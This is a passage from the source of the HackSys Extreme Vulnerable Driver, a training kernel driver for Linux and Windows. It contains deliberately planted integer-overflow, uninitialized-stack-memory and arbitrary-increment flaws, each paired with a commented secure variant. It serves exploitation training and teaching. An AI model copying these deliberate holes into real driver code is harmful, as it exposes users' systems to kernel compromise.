123 | return status;
124 | }
125 |
--------------------------------------------------------------------------------
/Driver/HEVD/Linux/BufferOverflowStack.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | BufferOverflowStack.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | buffer overflow in Stack module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __BUFFER_OVERFLOW_STACK_H__
54 | #define __BUFFER_OVERFLOW_STACK_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | /**
60 | * Function Definitions
61 | */
62 |
63 | int trigger_buffer_overflow_stack(void *user_buffer, size_t size);
64 |
65 | #endif // !__BUFFER_OVERFLOW_STACK_H__
66 |
--------------------------------------------------------------------------------
/Driver/HEVD/Linux/CMakeLists.txt:
--------------------------------------------------------------------------------
1 | if(SECURE)
2 | message("Generating secure HEVD build configuration")
3 | else()
4 | message("Generating vulnerable HEVD build configuration")
5 | endif()
6 |
7 |
8 | lkm_add_driver(
9 | NAME
10 | HEVD
11 | HackSysExtremeVulnerableDriver.c
12 | BufferOverflowStack.c
13 | IntegerOverflow.c
14 | ArbitraryWrite.c
15 | UninitializedMemoryStack.c
16 | )
17 |
--------------------------------------------------------------------------------
/Driver/HEVD/Linux/Common.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | Common.h
44 |
45 | Abstract:
46 | This module implements the data structures which
47 | are common to the driver modules.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __COMMON_H__
54 | #define __COMMON_H__
55 |
56 | #include
57 | #include
58 | #include
59 | #include
60 | #include
61 | #include
62 | #include
63 | #include
64 |
65 | /**
66 | * Defines
67 | */
68 |
69 | #define BUFFER_SIZE 512
70 |
71 | #define STATUS_SUCCESS 0x0
72 |
73 | #define _STRINGIFY(value) #value
74 | #define STRINGIFY(value) _STRINGIFY(value)
75 |
76 | #define PRINTK(level, fmt, ...) printk(KERN_##level "%s: " fmt, THIS_MODULE->name, ##__VA_ARGS__)
77 |
78 | #define ERR(fmt, ...) PRINTK(ERR, fmt, ##__VA_ARGS__)
79 | #define INFO(fmt, ...) PRINTK(INFO, fmt, ##__VA_ARGS__)
80 | #define WARNING(fmt, ...) PRINTK(WARNING, fmt, ##__VA_ARGS__)
81 |
82 | #if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,0,0))
83 |
84 | #define VERIFY_READ 0
85 | #define VERIFY_WRITE 1
86 | #define x_access_ok(type, addr, size) access_ok(addr, size)
87 |
88 | #else /* LINUX_VERSION_CODE < KERNEL_VERSION(5,0,0) */
89 |
90 | #define x_access_ok(type, addr, size) access_ok(type, addr, size)
91 |
92 | #endif /* LINUX_VERSION_CODE >= KERNEL_VERSION(5,0,0) */
93 |
94 | typedef void (*FunctionPointer)(void);
95 |
96 |
97 | /**
98 | * Structures
99 | */
100 |
101 | struct hevd_io {
102 | void *input_buffer;
103 | size_t input_buffer_length;
104 | void *output_buffer;
105 | size_t output_buffer_length;
106 | };
107 |
108 |
109 | /**
110 | * Function Definitions
111 | */
112 |
113 | int buffer_overflow_stack_ioctl_handler(struct hevd_io *io);
114 | int integer_overflow_ioctl_handler(struct hevd_io *io);
115 | int arbitrary_write_ioctl_handler(struct hevd_io *io);
116 | int uninitialized_memory_stack_ioctl_handler(struct hevd_io *io);
117 |
118 | #endif // !__COMMON_H__
119 |
--------------------------------------------------------------------------------
/Driver/HEVD/Linux/IntegerOverflow.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | IntegerOverlfow.c
44 |
45 | Abstract:
46 | This module implements the functions to demonstrate
47 | integer overflow in kernel module
48 |
49 | --*/
50 |
51 | #include "IntegerOverflow.h"
52 |
53 |
54 | /**
55 | * @param[in] user_buffer the pointer to user mode buffer
56 | * @param[in] size size of the user mode buffer
57 | * @return status code
58 | */
59 | int trigger_integer_overflow(void *user_buffer, size_t size)
60 | {
61 | unsigned long count = 0;
62 | int status = STATUS_SUCCESS;
63 | unsigned long kernel_buffer[BUFFER_SIZE] = {0};
64 | unsigned long kernel_buffer_terminator = 0xBAD0B0B0;
65 | size_t terminator_size = sizeof(kernel_buffer_terminator);
66 |
67 | INFO("[+] user_buffer: 0x%p\n", user_buffer);
68 | INFO("[+] user_buffer size: 0x%zX\n", size);
69 | INFO("[+] kernel_buffer: 0x%p\n", &kernel_buffer);
70 | INFO("[+] kernel_buffer size: 0x%zX\n", sizeof(kernel_buffer));
71 |
72 | #ifdef SECURE
73 | /**
74 | * Secure Note: This is secure because the developer is not doing any arithmetic
75 | * on the user supplied value. Instead, the developer is subtracting the size of
76 | * UINT i.e. 4 on x86 from the size of KernelBuffer. Hence, integer overflow will
77 | * not occur and this check will not fail
78 | */
79 |
80 | if (size > (sizeof(kernel_buffer) - terminator_size))
81 | {
82 | ERR("[-] Invalid user buffer size: 0x%zX\n", size);
83 |
84 | status = -EINVAL;
85 | return status;
86 | }
87 |
88 | #else
89 | INFO("[+] Triggering Integer Overflow\n");
90 |
91 | /**
92 | * Vulnerability Note: This is a vanilla Integer Overflow vulnerability because if
93 | * 'Size' is 0xFFFFFFFF and we do an addition with size of ULONG i.e. 4 on x86, the
94 | * integer will wrap down and will finally cause this check to fail
95 | */
96 |
97 | if ((size + terminator_size) > sizeof(kernel_buffer))
98 | {
99 | ERR("[-] Invalid user buffer size: 0x%zX\n", size);
100 |
101 | status = -EINVAL;
102 | return status;
103 | }
104 | #endif
105 |
106 | while (count < (size / sizeof(unsigned long)))
107 | {
108 | unsigned long n;
109 |
110 | if (copy_from_user((void *)&n, user_buffer + count, sizeof(n)))
111 | {
112 | status = -EFAULT;
113 | break;
114 | }
115 |
116 | if (n == kernel_buffer_terminator)
117 | {
118 | break;
119 | }
120 |
121 | kernel_buffer[count++] = n;
122 | }
123 |
124 | return status;
125 | }
126 |
127 |
128 | /**
129 | * @param[in] io user space buffer
130 | * @return status code
131 | */
132 | int integer_overflow_ioctl_handler(struct hevd_io *io)
133 | {
134 | size_t size = 0;
135 | void *user_buffer = NULL;
136 | int status = -EINVAL;
137 |
138 | user_buffer = io->input_buffer;
139 | size = io->input_buffer_length;
140 |
141 | if (user_buffer)
142 | {
143 | status = trigger_integer_overflow(user_buffer, size);
144 | }
145 |
146 | return status;
147 | }
148 |
--------------------------------------------------------------------------------
/Driver/HEVD/Linux/IntegerOverflow.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | IntegerOverflow.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | integer overflow module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __INTEGER_OVERFLOW_H__
54 | #define __INTEGER_OVERFLOW_H__
55 |
56 | #include "Common.h"
57 |
58 | /**
59 | * Function Definitions
60 | */
61 |
62 | int trigger_integer_overflow(void *user_buffer, size_t size);
63 |
64 | #endif
65 |
--------------------------------------------------------------------------------
/Driver/HEVD/Linux/UninitializedMemoryStack.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | UninitializedMemoryStack.c
44 |
45 | Abstract:
46 | This module implements the functions to demonstrate
47 | use of uninitialized memory in Stack vulnerability.
48 |
49 | --*/
50 |
51 | #include "UninitializedMemoryStack.h"
52 |
53 | ///
54 | /// Uninitialized Memory Stack Object Callback
55 | ///
56 | void
57 | UninitializedMemoryStackObjectCallback(void)
58 | {
59 | INFO("[+] Uninitialized Memory Stack Object Callback\n");
60 | }
61 |
62 |
63 | /**
64 | * @param[in] user_buffer the pointer to user mode buffer
65 | * @param[in] size size of the user mode buffer
66 | * @return status code
67 | */
68 | int trigger_uninitialized_memory_stack(void *user_buffer, size_t size)
69 | {
70 | unsigned long UserValue = 0;
71 | unsigned long MagicValue = 0xBAD0B0B0;
72 | int status = STATUS_SUCCESS;
73 |
74 | #ifdef SECURE
75 | //
76 | // Secure Note: This is secure because the developer is properly initializing
77 | // UNINITIALIZED_MEMORY_STACK to NULL and checks for NULL pointer before calling
78 | // the callback
79 | //
80 |
81 | UNINITIALIZED_MEMORY_STACK UninitializedMemory = { 0 };
82 | #else
83 | //
84 | // Vulnerability Note: This is a vanilla Uninitialized Memory in Stack vulnerability
85 | // because the developer is not initializing 'UNINITIALIZED_MEMORY_STACK' structure
86 | // before calling the callback when 'MagicValue' does not match 'UserValue'
87 | //
88 |
89 | UNINITIALIZED_MEMORY_STACK UninitializedMemory;
90 | #endif
91 |
92 | if(copy_from_user(&UserValue, user_buffer, sizeof(UserValue))) {
93 | ERR("Failed to copy UserValue from user space\n");
94 |
95 | status = -EINVAL;
96 | return status;
97 | }
98 |
99 | INFO("[+] UserValue: [0x%p] [0x%zX]\n", &UserValue, UserValue);
100 | INFO("[+] UninitializedMemory Address: 0x%p\n", &UninitializedMemory);
101 |
102 | if (UserValue == MagicValue) {
103 | UninitializedMemory.Value = UserValue;
104 | UninitializedMemory.Callback = &UninitializedMemoryStackObjectCallback;
105 | }
106 |
107 | #ifndef SECURE
108 | INFO("[+] Triggering Uninitialized Memory in Stack\n");
109 | #endif
110 |
111 | if (UninitializedMemory.Callback) {
112 | UninitializedMemory.Callback();
113 | }
114 |
115 | return status;
116 | }
117 |
118 |
119 | /**
120 | * @param[in] io user space buffer
121 | * @return status code
122 | */
123 | int uninitialized_memory_stack_ioctl_handler(struct hevd_io *io)
124 | {
125 | size_t size = 0;
126 | void *user_buffer = NULL;
127 | int status = -EINVAL;
128 |
129 | user_buffer = io->input_buffer;
130 | size = io->input_buffer_length;
131 |
132 | if (user_buffer)
133 | {
134 | status = trigger_uninitialized_memory_stack(user_buffer, size);
135 | }
136 |
137 | return status;
138 | }
139 |
--------------------------------------------------------------------------------
/Driver/HEVD/Linux/UninitializedMemoryStack.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | UninitializedMemoryStack.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | uninitialized memory in Stack module.
48 |
49 | --*/
50 |
51 | #ifndef __UNINITIALIZED_MEMORY_STACK_H__
52 | #define __UNINITIALIZED_MEMORY_STACK_H__
53 |
54 | #include "Common.h"
55 |
56 |
57 | //
58 | // Structures
59 | //
60 |
61 | typedef struct _UNINITIALIZED_MEMORY_STACK
62 | {
63 | unsigned long Value;
64 | FunctionPointer Callback;
65 | unsigned long Buffer[58];
66 | } UNINITIALIZED_MEMORY_STACK, *PUNINITIALIZED_MEMORY_STACK;
67 |
68 |
69 | //
70 | // Function Definitions
71 | //
72 |
73 | void
74 | UninitializedMemoryStackObjectCallback(void);
75 |
76 | int trigger_uninitialized_memory_stack(void *user_buffer, size_t size);
77 |
78 | #endif // !__UNINITIALIZED_MEMORY_STACK_H__
79 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/ArbitraryIncrement.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | ArbitraryIncrement.c
44 |
45 | Abstract:
46 | This module implements the functions to demonstrate
47 | Arbitrary Increment vulnerability.
48 |
49 | --*/
50 |
51 | #include "ArbitraryIncrement.h"
52 |
53 | #ifdef ALLOC_PRAGMA
54 | #pragma alloc_text(PAGE, TriggerArbitraryIncrement)
55 | #pragma alloc_text(PAGE, ArbitraryIncrementIoctlHandler)
56 | #endif // ALLOC_PRAGMA
57 |
58 |
59 | ///
60 | /// Trigger the Arbitrary Increment Vulnerability
61 | ///
62 | /// The pointer to user mode buffer
63 | /// NTSTATUS
64 | NTSTATUS
65 | TriggerArbitraryIncrement(
66 | _In_ PVOID UserBuffer
67 | )
68 | {
69 | NTSTATUS Status = STATUS_SUCCESS;
70 |
71 | PAGED_CODE();
72 |
73 | __try
74 | {
75 | //
76 | // Verify if the buffer resides in user mode
77 | //
78 |
79 | ProbeForRead(UserBuffer, sizeof(PULONG_PTR), (ULONG)__alignof(PULONG_PTR));
80 |
81 | //
82 | // Grab the user pointer
83 | //
84 |
85 | PCHAR UserPointerToIncrementValue = *(PCHAR*)UserBuffer;
86 |
87 | DbgPrint("[+] UserBuffer: 0x%p\n", UserBuffer);
88 | DbgPrint("[+] UserPointerToIncrementValue: 0x%p\n", UserPointerToIncrementValue);
89 | DbgPrint("[+] Value before increment: 0x%zX\n", *UserPointerToIncrementValue);
90 |
91 | #ifdef SECURE
92 |
93 | //
94 | // Secure Note: This is secure because the developer is properly validating if
95 | // 'UserPointerToIncrementValue' resides in User mode by calling ProbeForWrite() routine before
96 | // performing the increment operation
97 | //
98 |
99 | ProbeForWrite(UserPointerToIncrementValue, sizeof(PCHAR), (ULONG)__alignof(CHAR));
100 |
101 | (*(PCHAR)UserPointerToIncrementValue)++;
102 | #else
103 | DbgPrint("[+] Triggering Arbitrary Increment\n");
104 |
105 | //
106 | // Vulnerability Note: This is a vanilla Arbitrary Increment vulnerability
107 | // because the developer is incrementing value pointed by 'UserPointerToIncrementValue'
108 | // without properly validating if it resides in User mode
109 | //
110 |
111 | (*(PCHAR)UserPointerToIncrementValue)++;
112 | #endif
113 |
114 | DbgPrint("[+] Value after increment: 0x%zX\n", *UserPointerToIncrementValue);
115 | }
116 | __except (EXCEPTION_EXECUTE_HANDLER)
117 | {
118 | Status = GetExceptionCode();
119 | DbgPrint("[-] Exception Code: 0x%X\n", Status);
120 | }
121 |
122 | return Status;
123 | }
124 |
125 |
126 | ///
127 | /// Arbitrary Increment Ioctl Handler
128 | ///
129 | /// The pointer to IRP
130 | /// The pointer to IO_STACK_LOCATION structure
131 | /// NTSTATUS
132 | NTSTATUS
133 | ArbitraryIncrementIoctlHandler(
134 | _In_ PIRP Irp,
135 | _In_ PIO_STACK_LOCATION IrpSp
136 | )
137 | {
138 | PVOID UserBuffer = NULL;
139 | NTSTATUS Status = STATUS_UNSUCCESSFUL;
140 |
141 | UNREFERENCED_PARAMETER(Irp);
142 | PAGED_CODE();
143 |
144 | UserBuffer = IrpSp->Parameters.DeviceIoControl.Type3InputBuffer;
145 |
146 | if (UserBuffer)
147 | {
148 | Status = TriggerArbitraryIncrement(UserBuffer);
149 | }
150 |
151 | return Status;
152 | }
153 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/ArbitraryIncrement.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
